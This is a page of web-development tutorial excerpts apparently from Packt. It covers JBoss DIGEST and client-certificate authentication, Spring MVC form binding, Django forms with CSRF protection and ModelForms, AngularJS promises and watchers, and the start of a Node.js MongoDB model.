name="hashUserPassword" value="false"/> <module-option name="hashStorePassword" value="true"/> <module-option name="passwordIsA1Hash" value="true"/> <module-option name="storeDigestCallback" value=" org.jboss.security.auth.callback.RFC2617Digest"/> </login-module> </authentication> </security-domain> Finally, in the application, change the security domain name in the file jboss-web.xml as shown in the following snippet: <?xml version="1.0" encoding="UTF-8"?> <jboss-web> <security-domain>java:/jaas/domainDigest</security-domain> </jboss-web> We are going to change the authentication method from BASIC to DIGEST in the web.xml file. Also we enter the name of the security realm; all these changes must be applied in the tag login-config, this way: <login-config> <auth-method>DIGEST</auth-method> <realm-name>MyRealmName</realm-name </login-config> Now, restart the application server and then redeploy the application on JBoss. To do this, execute the next command on the terminal: mvn jboss-as:redeploy Authentication through certificates It is a mechanism in which a trust agreement is established between the server and the client through certificates. They must be signed by an agency established to ensure that the certificate presented for authentication is legitimate, it is known as CA. This security mechanism needs that our application server uses HTTPS as communication protocol. So we must enable HTTPS. Let's add a connector in the standalone.xml file; look for the following line: <connector name="http" Add the following block of code: <connector name="https" protocol="HTTP/1.1" scheme="https" socket-binding="https" secure="true"> <ssl password="changeit" certificate-key-file="${jboss.server.config.dir}/server.keystore" verify-client="want" ca-certificate-file="${jboss.server.config.dir}/server.truststore"/> </connector> Next we add the security domain: <security-domain name="RequireCertificateDomain"> <authentication> <login-module code="CertificateRoles" flag="required"> <module-option name="securityDomain" value="RequireCertificateDomain"/> <module-option name="verifier" value=" org.jboss.security.auth.certs.AnyCertVerifier"/> <module-option name="usersProperties" value= "${jboss.server.config.dir}/my-users.properties"/> <module-option name="rolesProperties" value= "${jboss.server.config.dir}/my-roles.properties"/> </login-module> </authentication> <jsse keystore-password="changeit" keystore-url= "file:${jboss.server.config.dir}/server.keystore" truststore-password="changeit" truststore-url ="file:${jboss.server.config.dir}/server.truststore"/> </security-domain> As you can see, we need two files: my-users.properties and my-roles.properties, both are empty and located in the JBOSS_HOME/standalone/configuration path. We are going to add the <user-data-constraint> tag in the web.xml in this way: <security-constraint> ...<user-data-constraint> <transport-guarantee>CONFIDENTIAL</transport-guarantee> </user-data-constraint> </security-constraint> Then, change the authentication method to CLIENT-CERT: <login-config> <auth-method>CLIENT-CERT</auth-method> </login-config> And finally change the security domain in the jboss-web.xml file in the following way: <?xml version="1.0" encoding="UTF-8"?> <jboss-web> <security-domain>RequireCertificateDomain</security-domain> </jboss-web> Now, restart the application server, and redeploy the application with Maven: mvn jboss-as:redeploy API keys With the advent of cloud computing, it is not difficult to think of applications that integrate with many others available in the cloud. Right now, it's easy to see how applications interact with Flickr, Facebook, Twitter, Tumblr, and so on through APIKeys usage. This authentication method is used primarily when we need to authenticate from another application but we do not want to access the private user data hosted in another application, on the contrary, if you want to access this information, you must use OAuth. Today it is very easy to get an API key. Simply log into one of the many cloud providers and obtain credentials, consisting of a KEY and a SECRET, the same that are needed to interact with the authenticating service providers. Keep in mind that when creating an API Key, accept the terms of the supplier, which clearly states what we can and cannot do, protecting against abusive users trying to affect their services. The following chart shows how this authentication mechanism works: Summary In this article, we went through some models of authentication. We can apply them to any web service functionality we created. As you realize, it is important to choose the correct security management, otherwise information is exposed and can easily be intercepted and used by third parties. Therefore, tread carefully. Resources for Article: Further resources on this subject: RESTful Java Web Services Design [Article] Debugging REST Web Services [Article] RESTful Services JAX-RS 2.0 [Article]
Read more
  • 0
  • 0
  • 2634

article-image-serving-and-processing-forms
Packt
24 Jun 2014
13 min read
Save for later

Serving and processing forms

Packt
24 Jun 2014
13 min read
(For more resources related to this topic, see here.) Spring supports different view technologies, but if we are using JSP-based views, we can make use of the Spring tag library tags to make up our JSP pages. These tags provide many useful, common functionalities such as form binding, evaluating errors outputting internationalized messages, and so on. In order to use these tags, we must add references to this tag library in our JSP pages as follows: <%@taglib prefix="form" uri="http://www.springframework.org/tags/form" %> <%@taglib prefix="spring" uri="http://www.springframework.org/tags" %> The data transfer took place from model to view via the controller. The following line is a typical example of how we put data into the model from a controller: model.addAttribute(greeting,"Welcome") Similarly the next line shows how we retrieve that data in the view using the JSTL expression: <p> ${greeting} </p> JavaServer Pages Standard Tag Library (JSTL) is also a tag library provided by Oracle. And it is a collection of useful JSP tags that encapsulates the core functionality common to many JSP pages. We can add a reference to the JSTL tag library in our JSP pages as <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>. However, what if we want to put data into the model from the view? How do we retrieve that data from the controller? For example, consider a scenario where an admin of our store wants to add new product information in our store by filling and submitting an HTML form. How can we collect the values filled in the HTML form elements and process it in the controller? This is where the Spring tag library tags help us to bind the HTML tag element's values to a form-backing bean in the model. Later, the controller can retrieve the form-backing bean from the model using the @ModelAttribute annotation (org.springframework.web.bind.annotation.ModelAttribute). Form-backing beans (sometimes called form beans) are used to store form data. We can even use our domain objects as form beans; this works well when there's a close match between the fields on the form and the properties on our domain object. Another approach is to create separate classes for form beans, which are sometimes called Data Transfer Objects (DTOs). Time for action – serving and processing forms The Spring tag library provides some special <form> and <input> tags that are more or less similar to HTML form and input tags, but it has some special attributes to bind the form elements data with the form-backing bean. Let's create a Spring web form in our application to add new products to our product list by performing the following steps: We open our ProductRepository interface and add one more method declaration in it as follows: void addProduct(Product product); We then add an implementation for this method in the InMemoryProductRepository class as follows: public void addProduct(Product product) { listOfProducts.add(product); } We open our ProductService interface and add one more method declaration in it as follows: void addProduct(Product product); And, we add an implementation for this method in the ProductServiceImpl class as follows: public void addProduct(Product product) { productRepository.addProduct(product); } We open our ProductController class and add two more request mapping methods as follows: @RequestMapping(value = "/add", method = RequestMethod.GET) public String getAddNewProductForm(Model model) { Product newProduct = new Product(); model.addAttribute("newProduct", newProduct); return "addProduct"; } @RequestMapping(value = "/add", method = RequestMethod.POST) public String processAddNewProductForm(@ModelAttribute("newProduct") Product newProduct) { productService.addProduct(newProduct); return "redirect:/products"; } Finally, we add one more JSP view file called addProduct.jsp under src/main/webapp/WEB-INF/views/ and add the following tag reference declaration in it as the very first line: <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%> <%@ taglib prefix="form" uri="http://www.springframework.org/tags/form" %> Now, we add the following code snippet under the tag declaration line and save addProduct.jsp (note that I have skipped the <form:input> binding tags for some of the fields of the product domain object, but I strongly encourage that you add binding tags for the skipped fields when you try out this exercise): <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <link rel="stylesheet"href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css"> <title>Products</title> </head> <body> <section> <div class="jumbotron"> <div class="container"> <h1>Products</h1> <p>Add products</p> </div> </div> </section> <section class="container"> <form:form modelAttribute="newProduct" class="form-horizontal"> <fieldset> <legend>Add new product</legend> <div class="form-group"> <label class="control-label col-lg-2 col-lg-2" for="productId">Product Id</label> <div class="col-lg-10"> <form:input id="productId" path="productId" type="text" class="form:input-large"/> </div> </div> <!-- Similarly bind <form:input> tag for name,unitPrice,manufacturer,category,unitsInStock and unitsInOrder fields--> <div class="form-group"> <label class="control-label col-lg-2" for="description">Description</label> <div class="col-lg-10"> form:textarea id="description" path="description" rows = "2"/> </div> </div> <div class="form-group"> <label class="control-label col-lg-2" for="discontinued">Discontinued</label> <div class="col-lg-10"> <form:checkbox id="discontinued" path="discontinued"/> </div> </div> <div class="form-group"> <label class="control-label col-lg-2" for="condition">Condition</label> <div class="col-lg-10"> <form:radiobutton path="condition" value="New" />New <form:radiobutton path="condition" value="Old" />Old <form:radiobutton path="condition" value="Refurbished" />Refurbished </div> </div> <div class="form-group"> <div class="col-lg-offset-2 col-lg-10"> <input type="submit" id="btnAdd" class="btn btn-primary" value ="Add"/> </div> </div> </fieldset> </form:form> </section> </body> </html> Now, we run our application and enter the URL http://localhost:8080/webstore/products/add. We will be able to see a web page that displays a web form where we can add the product information as shown in the following screenshot: Add the product's web form Now, we enter all the information related to the new product that we want to add and click on the Add button; we will see the new product added in the product listing page under the URL http://localhost:8080/webstore/products. What just happened? In the whole sequence, steps 5 and 6 are very important steps that need to be observed carefully. I will give you a brief note on what we have done in steps 1 to 4. In step 1, we created a method declaration addProduct in our ProductRepository interface to add new products. In step 2, we implemented the addProduct method in our InMemoryProductRepository class; the implementation is just to update the existing listOfProducts by adding a new product to the list. Steps 3 and 4 are just a service layer extension for ProductRepository. In step 3, we declared a similar method, addProduct, in our ProductService interface and implemented it in step 4 to add products to the repository via the productRepository reference. Okay, coming back to the important step; we have done nothing but added two request mapping methods, namely, getAddNewProductForm and processAddNewProductForm, in step 5 as follows: @RequestMapping(value = "/add", method = RequestMethod.GET) public String getAddNewProductForm(Model model) { Product newProduct = new Product(); model.addAttribute("newProduct", newProduct); return "addProduct"; } @RequestMapping(value = "/add", method = RequestMethod.POST) public String processAddNewProductForm(@ModelAttribute("newProduct") Product productToBeAdded) { productService.addProduct(productToBeAdded); return "redirect:/products"; } If you observe these methods carefully, you will notice a peculiar thing, which is that both the methods have the same URL mapping value in their @RequestMapping annotation (value = "/add"). So, if we enter the URL http://localhost:8080/webstore/products/add in the browser, which method will Spring MVC map that request to? The answer lies in the second attribute of the @RequestMapping annotation (method = RequestMethod.GET and method = RequestMethod.POST). If you will notice again, even though both methods have the same URL mapping, they differ in request method. So, what is happening behind the screen is that when we enter the URL http://localhost:8080/webstore/products/add in the browser, it is considered as a GET request. So, Spring MVC maps this request to the getAddNewProductForm method, and within this method, we simply attach a new empty Product domain object to the model under the attribute name, newProduct. Product newProduct = new Product(); model.addAttribute("newProduct", newProduct); So in the view addproduct.jsp, we can access this model object, newProduct. Before jumping into the processAddNewProductForm method, let's review the addproduct.jsp view file for some time so that we are able to understand the form processing flow without confusion. In addproduct.jsp, we have just added a <form:form> tag from the Spring tag library using the following line of code: <form:form modelAttribute="newProduct" class="form-horizontal"> Since this special <form:form> tag is acquired from the Spring tag library, we need to add a reference to this tag library in our JSP file. That's why we have added the following line at the top of the addProducts.jsp file in step 6: <%@ taglib prefix="form" uri="http://www.springframework.org/tags/form" %> In the Spring <form:form> tag, one of the important attributes is modelAttribute. In our case, we assigned the value newProduct as the value of modelAttribute in the <form:form> tag. If you recall correctly, you will notice that this value of modelAttribute and the attribute name we used to store the newProduct object in the model from our getAddNewProductForm method are the same. So, the newProduct object that we attached to the model in the controller method (getAddNewProductForm) is now bound to the form. This object is called the form-backing bean in Spring MVC. Okay, now notice each <form:input> tag inside the <form:form> tag shown in the following code. You will observe that there is a common attribute in every tag. This attribute name is path: <form:input id="productId" path="productId" type="text" class="form:input-large"/> The path attribute just indicates the field name that is relative to the form-backing bean. So, the value that is entered in this input box at runtime will be bound to the corresponding field of the form bean. Okay, now is the time to come back and review our processAddNewProductForm method. When will this method be invoked? This method will be invoked once we press the submit button of our form. Yes, since every form submission is considered as a POST request, this time the browser will send a POST request to the same URL, that is, http://localhost:8080/webstore/products/add. So, this time, the processAddNewProductForm method will get invoked since it is a POST request. Inside the processAddNewProductForm method, we simply call the service method addProduct to add the new product to the repository, as follows: productService.addProduct(productToBeAdded); However, the interesting question here is, how is the productToBeAdded object populated with the data that we entered in the form? The answer lies within the @ModelAttribute annotation (org.springframework.web.bind.annotation.ModelAttribute). Note the method signature of the processAddNewProductForm method shown in the following line of code: public String processAddNewProductForm(@ModelAttribute("newProduct") Product productToBeAdded) Here, if you notice the value attribute of the @ModelAttribute annotation, you will observe a pattern. The values of the @ModelAttribute annotation and modelAttribute from the <form:form> tag are the same. So, Spring MVC knows that it should assign the form-bound newProduct object to the productToBeAdded parameter of the processAddNewProductForm method. The @ModelAttribute annotation is not only used to retrieve an object from a model, but if we want to, we can even use it to add objects to the model. For instance, we rewrite our getAddNewProductForm method to something like the following code with the use of the @ModelAttribute annotation: @RequestMapping(value = "/add", method = RequestMethod.GET) public String getAddNewProductForm(@ModelAttribute("newProduct") Product newProduct) { return "addProduct"; } You can notice that we haven't created any new empty Product domain object and attached it to the model. All we have done was added a parameter of the type Product and annotated it with the @ModelAttribute annotation so that Spring MVC would know that it should create an object of Product and attach it to the model under the name newProduct. One more thing that needs to be observed in the processAddNewProductForm method is the logical view name, redirect:/products, that it returns. So, what are we trying to tell Spring MVC by returning a string redirect:/products? To get the answer, observe the logical view name string carefully. If we split this string with the : (colon) symbol, we will get two parts; the first part is the prefix redirect and the second part is something that looks like a request path, /products. So, instead of returning a view name, we simply instruct Spring to issue a redirect request to the request path, /products, which is the request path for the list method of our ProductController class. So, after submitting the form, we list the products using the list method of ProductController. As a matter of fact, when we return any request path with the redirect: prefix from a request mapping method, Spring uses a special view object, RedirectView (org.springframework.web.servlet.view.RedirectView), to issue a redirect command behind the screen. Instead of landing in a web page after the successful submission of a web form, we are spawning a new request to the request path /products with the help of RedirectView. This pattern is called Redirect After Post, which is a common pattern to use with web-based forms. We are using this pattern to avoid double submission of the same form; sometimes, if we press the browser's refresh button or back button after submitting the form, there are chances that the same form will be resubmitted. Summary This article introduced you to Spring and Spring form tag libraries in web form handling. You also learned how to bind domain objects with views and how to use message bundles to externalize label caption texts. Resources for Article: Further resources on this subject: Spring MVC - Configuring and Deploying the Application [article] Getting Started With Spring MVC - Developing the MVC components [article] So, what is Spring for Android? [article]
Read more
  • 0
  • 0
  • 1280

article-image-adding-developer-django-forms
Packt
18 Jun 2014
8 min read
Save for later

Adding a developer with Django forms

Packt
18 Jun 2014
8 min read
(For more resources related to this topic, see here.) When displaying the form, it will generate the contents of the form template. We may change the type of field that the object sends to the template if needed. While receiving the data, the object will check the contents of each form element. If there is an error, the object will send a clear error to the client. If there is no error, we are certain that the form data is correct. CSRF protection Cross-Site Request Forgery (CSRF) is an attack that targets a user who is loading a page that contains a malicious request. The malicious script uses the authentication of the victim to perform unwanted actions, such as changing data or access to sensitive data. The following steps are executed during a CSRF attack: Script injection by the attacker. An HTTP query is performed to get a web page. Downloading the web page that contains the malicious script. Malicious script execution. In this kind of attack, the hacker can also modify information that may be critical for the users of the website. Therefore, it is important for a web developer to know how to protect their site from this kind of attack, and Django will help with this. To re-enable CSRF protection, we must edit the settings.py file and uncomment the following line: 'django.middleware.csrf.CsrfViewMiddleware', This protection ensures that the data that has been sent is really sent from a specific property page. You can check this in two easy steps: When creating an HTML or Django form, we insert a CSRF token that will store the server. When the form is sent, the CSRF token will be sent too. When the server receives the request from the client, it will check the CSRF token. If it is valid, it validates the request. Do not forget to add the CSRF token in all the forms of the site where protection is enabled. HTML forms are also involved, and the one we have just made does not include the token. For the previous form to work with CSRF protection, we need to add the following line in the form of tags and <form> </form>: {% csrf_token %} The view with a Django form We will first write the view that contains the form because the template will display the form defined in the view. Django forms can be stored in other files as forms.py at the root of the project file. We include them directly in our view because the form will only be used on this page. Depending on the project, you must choose which architecture suits you best. We will create our view in the views/create_developer.py file with the following lines: from django.shortcuts import render from django.http import HttpResponse from TasksManager.models import Supervisor, Developer from django import forms # This line imports the Django forms package class Form_inscription(forms.Form): # This line creates the form with four fields. It is an object that inherits from forms.Form. It contains attributes that define the form fields. name = forms.CharField(label="Name", max_length=30) login = forms.CharField(label="Login", max_length=30) password = forms.CharField(label="Password", widget=forms.PasswordInput) supervisor = forms.ModelChoiceField(label="Supervisor", queryset=Supervisor.objects.all()) # View for create_developer def page(request): if request.POST: form = Form_inscription(request.POST) # If the form has been posted, we create the variable that will contain our form filled with data sent by POST form. if form.is_valid(): # This line checks that the data sent by the user is consistent with the field that has been defined in the form. name = form.cleaned_data['name'] # This line is used to retrieve the value sent by the client. The collected data is filtered by the clean() method that we will see later. This way to recover data provides secure data. login = form.cleaned_data['login'] password = form.cleaned_data['password'] supervisor = form.cleaned_data['supervisor'] # In this line, the supervisor variable is of the Supervisor type, that is to say that the returned data by the cleaned_data dictionary will directly be a model. new_developer = Developer(name=name, login=login, password=password, email="", supervisor=supervisor) new_developer.save() return HttpResponse("Developer added") else: return render(request, 'en/public/create_developer.html', {'form' : form}) # To send forms to the template, just send it like any other variable. We send it in case the form is not valid in order to display user errors: else: form = Form_inscription() # In this case, the user does not yet display the form, it instantiates with no data inside. return render(request, 'en/public/create_developer.html', {'form' : form}) This screenshot shows the display of the form with the display of an error message: Template of a Django form We set the template for this view. The template will be much shorter: {% extends "base.html" %} {% block title_html %} Create Developer {% endblock %} {% block h1 %} Create Developer {% endblock %} {% block article_content %} <form method="post" action="{% url "create_developer" %}" > {% csrf_token %} <!-- This line inserts a CSRF token. --> <table> {{ form.as_table }} <!-- This line displays lines of the form.--> </table> <p><input type="submit" value="Create" /></p> </form> {% endblock %} As the complete form operation is in the view, the template simply executes the as_table() method to generate the HTML form. The previous code displays data in tabular form. The three methods to generate an HTML form structure are as follows: as_table: This displays fields in the <tr> <td> tags as_ul: This displays the form fields in the <li> tags as_p: This displays the form fields in the <p> tags So, we quickly wrote a secure form with error handling and CSRF protection through Django forms. The form based on a model ModelForms are Django forms based on models. The fields of these forms are automatically generated from the model that we have defined. Indeed, developers are often required to create forms with fields that correspond to those in the database to a non-MVC website. These particular forms have a save() method that will save the form data in a new record. The supervisor creation form To broach ModelForms, we will take, for example, the addition of a supervisor. For this, we will create a new page. For this, we will create the following URL: url(r'^create-supervisor$', 'TasksManager.views.create_supervisor.page', name="create_supervisor"), Our view will contain the following code: from django.shortcuts import render from TasksManager.models import Supervisor from django import forms from django.http import HttpResponseRedirect from django.core.urlresolvers import reverse def page(request): if len(request.POST) > 0: form = Form_supervisor(request.POST) if form.is_valid(): form.save(commit=True) # If the form is valid, we store the data in a model record in the form. return HttpResponseRedirect(reverse('public_index')) # This line is used to redirect to the specified URL. We use the reverse() function to get the URL from its name defines urls.py. else: return render(request, 'en/public/create_supervisor.html', {'form': form}) else: form = Form_supervisor() return render(request, 'en/public/create_supervisor.html', {'form': form}) class Form_supervisor(forms.ModelForm): # Here we create a class that inherits from ModelForm. class Meta: # We extend the Meta class of the ModelForm. It is this class that will allow us to define the properties of ModelForm. model = Supervisor # We define the model that should be based on the form. exclude = ('date_created', 'last_connexion', ) # We exclude certain fields of this form. It would also have been possible to do the opposite. That is to say with the fields property, we have defined the desired fields in the form. As seen in the line exclude = ('date_created', 'last_connexion', ), it is possible to restrict the form fields. Both the exclude and fields properties must be used correctly. Indeed, these properties receive a tuple of the fields to exclude or include as arguments. They can be described as follows: exclude: This is used in the case of an accessible form by the administrator. Because, if you add a field in the model, it will be included in the form. fields: This is used in cases in which the form is accessible to users. Indeed, if we add a field in the model, it will not be visible to the user. For example, we have a website selling royalty-free images with a registration form based on ModelForm. The administrator adds a credit field in the extended model of the user. If the developer has used an exclude property in some of the fields and did not add credits, the user will be able to take as many credits as he/she wants. We will resume our previous template, where we will change the URL present in the attribute action of the <form> tag: {% url "create_supervisor" %} This example shows us that ModelForms can save a lot of time in development by having a form that can be customized (by modifying the validation, for example). Summary This article discusses Django forms. It explains how to create forms with Django and how to treat them. Resources for Article: Further resources on this subject: So, what is Django? [article] Creating an Administration Interface in Django [article] Django Debugging Overview [article]
Read more
  • 0
  • 0
  • 1437
article-image-working-live-data-and-angularjs
Packt
12 Jun 2014
14 min read
Save for later

Working with Live Data and AngularJS

Packt
12 Jun 2014
14 min read
(For more resources related to this topic, see here.) Big Data is a new field that is growing every day. HTML5 and JavaScript applications are being used to showcase these large volumes of data in many new interesting ways. Some of the latest client implementations are being accomplished with libraries such as AngularJS. This is because of its ability to efficiently handle and organize data in many forms. Making business-level decisions off of real-time data is a revolutionary concept. Humans have only been able to fathom metrics based off of large-scale systems, in real time, for the last decade at most. During this time, the technology to collect large amounts of data has grown tremendously, but the high-level applications that use this data are only just catching up. Anyone can collect large amounts of data with today's complex distributed systems. Displaying this data in different formats that allow for any level of user to digest and understand its meaning is currently the main portion of what the leading-edge technology is trying to accomplish. There are so many different formats that raw data can be displayed in. The trick is to figure out the most efficient ways to showcase patterns and trends, which allow for more accurate business-level decisions to be made. We live in a fast paced world where everyone wants something done in real time. Load times must be in milliseconds, new features are requested daily, and deadlines get shorter and shorter. The Web gives companies the ability to generate revenue off a completely new market and AngularJS is on the leading edge. This new market creates many new requirements for HTML5 applications. JavaScript applications are becoming commonplace in major companies. These companies are using JavaScript to showcase many different types of data from inward to outward facing products. Working with live data sets in client-side applications is a common practice and is the real world standard. Most of the applications today use some type of live data to accomplish some given set of tasks. These tasks rely on this data to render views that the user can visualize and interact with. There are many advantages of working with the Web for data visualization, and we are going to showcase how these tie into an AngularJS application. AngularJS offers different methods to accomplish a view that is in charge of elegantly displaying large amounts of data in very flexible and snappy formats. Some of these different methods feed directives' data that has been requested and resolved, while others allow the directive to maintain control of the requests. We will go over these different techniques of how to efficiently get live data into the view layer by creating different real-world examples. We will also go over how to properly test directives that rely on live data to achieve their view successfully. Techniques that drive directives Most standard data requirements for a modern application involve an entire view that depends on a set of data. This data should be dependent on the current state of the application. The state can be determined in different ways. A common tactic is to build URLs that replicate a snapshot of the application's state. This can be done with a combination of URL paths and parameters. URL paths and parameters are what you will commonly see change when you visit a website and start clicking around. An AngularJS application is made up of different route configurations that use the URL to determine which action to take. Each configuration will have an associated controller, template, and other forms of options. These configurations work in unison to get data into the application in the most efficient ways. AngularUI also offers its own routing system. This UI-Router is a simple system built on complex concepts, which allows nested views to be controlled by different state options. This concept yields the same result as ngRoute, which is to get data into the controller; however, UI-Router does it in a more eloquent way, which creates more options. AngularJS 2.0 will contain a hybrid router that utilizes the best of each. Once the controller gets the data, it feeds the retrieved data to the template views. The template is what holds the directives that are created to perform the view layer functionality. The controller feeds directives' data, which forces the directives to rely on the controllers to be in charge of the said data. This data can either be fed immediately after the route configurations are executed or the application can wait for the data to be resolved. AngularJS offers you the ability to make sure that data requests have been successfully accomplished before any controller logic is executed. The method is called resolving data, and it is utilized by adding the resolve functions to the route configurations. This allows you to write the business logic in the controller in a synchronous manner, without having to write callbacks, which can be counter-intuitive. The XHR extensions of AngularJS are built using promise objects. These promise objects are basically a way to ensure that data has been successfully retrieved or to verify whether an error has occurred. Since JavaScript embraces callbacks at the core, there are many points of failure with respect to timing issues of when data is ready to be worked with. This is where libraries such as the Q library come into play. The promise object allows the execution thread to resemble a more synchronous flow, which reduces complexity and increases readability. The $q library The $q factory is a lite instantiation of the formally accepted Q library (https://github.com/kriskowal/q). This lite package contains only the functions that are needed to defer JavaScript callbacks asynchronously, based on the specifications provided by the Q library. The benefits of using this object are immense, when working with live data. Basically, the $q library allows a JavaScript application to mimic synchronous behavior when dealing with asynchronous data requests or methods that are not thread blocked by nature. This means that we can now successfully write our application's logic in a way that follows a synchronous flow. ES6 (ECMAScript6) incorporates promises at its core. This will eventually alleviate the need, for many functions inside the $q library or the entire library itself, in AngularJS 2.0. The core AngularJS service that is related to CRUD operations is called $http. This service uses the $q library internally to allow the powers of promises to be used anywhere a data request is made. Here is an example of a service that uses the $q object in order to create an easy way to resolve data in a controller. Refer to the following code: this.getPhones = function() { var request = $http.get('phones.json'), promise; promise = request.then(function(response) { return response.data; },function(errorResponse){ return errorResponse; }); return promise; } Here, we can see that the phoneService function uses the $http service, which can request for all the phones. The phoneService function creates a new request object, that calls a then function that returns a promise object. This promise object is returned synchronously. Once the data is ready, the then function is called and the correct data response is returned. This service is best showcased correctly when used in conjunction with a resolve function that feeds data into a controller. The resolve function will accept the promise object being returned and will only allow the controller to be executed once all of the phones have been resolved or rejected. The rest of the code that is needed for this example is the application's configuration code. The config process is executed on the initialization of the application. This is where the resolve function is supposed to be implemented. Refer to the following code: var app = angular.module('angularjs-promise-example',['ngRoute']); app.config(function($routeProvider){ $routeProvider.when('/', { controller: 'PhoneListCtrl', templateUrl: 'phoneList.tpl.html', resolve: { phones: function(phoneService){ return phoneService.getPhones(); } } }).otherwise({ redirectTo: '/' }); }) app.controller('PhoneListCtrl', function($scope, phones) { $scope.phones = phones; }); A live example of this basic application can be found at http://plnkr.co/edit/f4ZDCyOcud5WSEe9L0GO?p=preview. Directives take over once the controller executes its initial context. This is where the $compile function goes through all of its stages and links directives to the controller's template. The controller will still be in charge of driving the data that is sitting inside the template view. This is why it is important for directives to know what to do when their data changes. How should data be watched for changes? Most directives are on a need-to-know basis about the details of how they receive the data that is in charge of their view. This is a separation of logic that reduces cyclomatic complexity in an application. The controllers should be in charge of requesting data and passing this data to directives, through their associated $scope object. Directives should be in charge of creating DOM based on what data they receive and when the data changes. There are an infinite number of possibilities that a directive can try to achieve once it receives its data. Our goal is to showcase how to watch live data for changes and how to make sure that this works at scale so that our directives have the opportunity to fulfill their specific tasks. There are three built-in ways to watch data in AngularJS. Directives use the following methods to carry out specific tasks based on the different conditions set in the source of the program: Watching an object's identity for changes Recursively watching all of the object's properties for changes Watching just the top level of an object's properties for changes Each of these methods has its own specific purpose. The first method can be used if the variable that is being watched is a primitive type. The second type of method is used for deep comparisons between objects. The third type is used to do a shallow watch on an array of any type or just on a normal object. Let's look at an example that shows the last two watcher types. This example is going to use jsPerf to showcase our logic. We are leaving the first watcher out because it only watches primitive types and we will be watching many objects for different levels of equality. This example sets the $scope variable in the app's run function because we want to make sure that the jsPerf test resets each data set upon initialization. Refer to the following code: app.run(function($rootScope) { $rootScope.data = [ {'bob': true}, {'frank': false}, {'jerry': 'hey'}, {'bargle':false}, {'bob': true}, {'bob': true}, {'frank': false}, {'jerry':'hey'},{'bargle': false},{'bob': true},{'bob': true},{'frank': false}]; }); This run function sets up our data object that we will watch for changes. This will be constant throughout every test we run and will reset back to this form at the beginning of each test. Doing a deep watch on $rootScope.data This watch function will do a deep watch on the data object. The true flag is the key to setting off a deep watch. The purpose of a deep comparison is to go through every object property and compare it for changes on every digest. This is an expensive function and should be used only when necessary. Refer to the following code: app.service('Watch', function($rootScope) { return { run: function() { $rootScope.$watch('data', function(newVal, oldVal) { },true); //the digest is here because of the jsPerf test. We are using thisrun function to mimic a real environment. $rootScope.$digest(); } }; }); Doing a shallow watch on $rootScope.data The shallow watch is called whenever a top-level object is changed in the data object. This is less expensive because the application does not have to traverse n levels of data. Refer to the following code: app.service('WatchCollection', function($rootScope) { return { run: function() { $rootScope.$watchCollection('data', function(n, o) { }); $rootScope.$digest(); } }; }); During each individual test, we get each watcher service and call its run function. This fires the watcher on initialization, and then we push another test object to the data array, which fires the watch's trigger function again. That is the end of the test. We are using jsperf.com to show the results. Note that the watchCollection function is much faster and should be used in cases where it is acceptable to shallow watch an object. The example can be found at http://jsperf.com/watchcollection-vs-watch/5. Refer to the following screenshot: This test implies that the watchCollection function is a better choice to watch an array of objects that can be shallow watched for changes. This test is also true for an array of strings, integers, or floats. This brings up more interesting points, such as the following: Does our directive depend on a deep watch of the data? Do we want to use the $watch function, even though it is slow and memory taxing? Is it possible to use the $watch function if we are using large data objects? The directives that have been used in this book have used the watch function to watch data directly, but there are other methods to update the view if our directives depend on deep watchers and very large data sets. Directives can be in charge There are some libraries that believe that elements can be in charge of when they should request data. Polymer (http://www.polymer-project.org/) is a JavaScript library that allows DOM elements to control how data is requested, in a declarative format. This is a slight shift from the processes that have been covered so far in this article, when thinking about what directives are meant for and how they should receive data. Let's come up with an actual use case that could possibly allow this type of behavior. Let's consider a page that has many widgets on it. A widget is a directive that needs a set of large data objects to render its view. To be more specific, lets say we want to show a catalog of phones. Each phone has a very large amount of data associated with it, and we want to display this data in a very clean simple way. Since watching large data sets can be very expensive, what will allow directives to always have the data they require, depending on the state of the application? One option is to not use the controller to resolve the Big Data and inject it into a directive, but rather to use the controller to request for directive configurations that tell the directive to request certain data objects. Some people would say this goes against normal conventions, but I say it's necessary when dealing with many widgets in the same view, which individually deal with large amounts of data. This method of using directives to determine when data requests should be made is only suggested if many widgets on a page depend on large data sets. To create this in a real-life example, let's take the phoneService function, which was created earlier, and add a new method to it called getPhone. Refer to the following code: this.getPhone = function(config) { return $http.get(config.url); }; Now, instead of requesting for all the details on the initial call, the original getPhones method only needs to return phone objects with a name and id value. This will allow the application to request the details on demand. To do this, we do not need to alter the getPhones method that was created earlier. We only need to alter the data that is supplied when the request is made. It should be noted that any directive that is requesting data should be tested to prove that it is requesting the correct data at the right time. Testing directives that control data Since the controller is usually in charge of how data is incorporated into the view, many directives do not have to be coupled with logic related to how that data is retrieved. Keeping things separate is always good and is encouraged, but in some cases, it is necessary that directives and XHR logic be used together. When these use cases reveal themselves in production, it is important to test them properly. The tests in the book use two very generic steps to prove business logic. These steps are as follows: Create, compile, and link DOM to the AngularJS digest cycle Test scope variables and DOM interactions for correct outputs Now, we will add one more step to the process. This step will lie in the middle of the two steps. The new step is as follows: Make sure all data communication is fired correctly AngularJS makes it very simple to allow additional resource related logic. This is because they have a built-in backend service mock, which allows many different ways to create fake endpoints that return structured data. The service is called $httpBackend.
Read more
  • 0
  • 0
  • 3732

article-image-selecting-and-initializing-database
Packt
10 Jun 2014
7 min read
Save for later

Selecting and initializing the database

Packt
10 Jun 2014
7 min read
(For more resources related to this topic, see here.) In other words, it's simpler than a SQL database, and very often stores information in the key value type. Usually, such solutions are used when handling and storing large amounts of data. It is also a very popular approach when we need flexible schema or when we want to use JSON. It really depends on what kind of system we are building. In some cases, MySQL could be a better choice, while in some other cases, MongoDB. In our example blog, we're going to use both. In order to do this, we will need a layer that connects to the database server and accepts queries. To make things a bit more interesting, we will create a module that has only one API, but can switch between the two database models. Using NoSQL with MongoDB Let's start with MongoDB. Before we start storing information, we need a MongoDB server running. It can be downloaded from the official page of the database https://www.mongodb.org/downloads. We are not going to handle the communication with the database manually. There is a driver specifically developed for Node.js. It's called mongodb and we should include it in our package.json file. After successful installation via npm install, the driver will be available in our scripts. We can check this as follows: "dependencies": { "mongodb": "1.3.20" } We will stick to the Model-View-Controller architecture and the database-related operations in a model called Articles. We can see this as follows: var crypto = require("crypto"), type = "mongodb", client = require('mongodb').MongoClient, mongodb_host = "127.0.0.1", mongodb_port = "27017", collection; module.exports = function() { if(type == "mongodb") { return { add: function(data, callback) { ... }, update: function(data, callback) { ... }, get: function(callback) { 